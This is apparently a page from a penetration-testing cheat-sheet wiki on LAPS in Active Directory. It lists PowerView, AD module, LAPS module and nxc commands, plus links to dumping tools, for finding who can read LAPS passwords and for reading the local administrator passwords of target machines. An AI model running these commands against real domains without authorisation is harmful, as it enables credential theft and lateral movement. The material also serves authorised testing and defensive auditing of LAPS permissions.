LAPS

On a computer, if LAPS is in use, a library AdmPwd.dll can be found in the C:\Program Files\LAPS\CSE\

Users who can read LAPS passwords

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

OUs where LAPS is in use along with users who can read the passwords in clear text

# LAPS Module
Import-Module .\AdmPwd.PS.psd1
Find-AdmPwdExtendedRights -Identity OUDistinguishedName

# AD Module
.\Get-LapsPermissions.ps1

Read LAPS Passwords

# PowerView
Get-DomainObject-Identity<targetmachine$>| select -ExpandProperty ms-mcs-admpwd

# AD Module
Get-ADComputer -Identity <targetmachine> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

# LAPS Module
Get-AdmPwdPassword -ComputerName <targetmachine>

LAPSDumper

GitHub - n00py/LAPSDumper: Dumping LAPS from PythonGitHub

goLAPS

GitHub - sensepost/goLAPS: Retrieve LAPS passwords from a domain. The tools is inspired in pyLAPS.GitHub

SensePost | Golaps

NXC

If the default administrator name is not administrator add the user after the option --laps name

nxc smb <ip> -u user-can-read-laps -p pass --laps

nxc winrm <ip> -u user-can-read-laps -p pass --laps

SharpLAPS

GitHub - swisskyrepo/SharpLAPS: Retrieve LAPS password from LDAPGitHub

PreviousTrustee and Resource Delegation NextDCSync

Last updated 1 month ago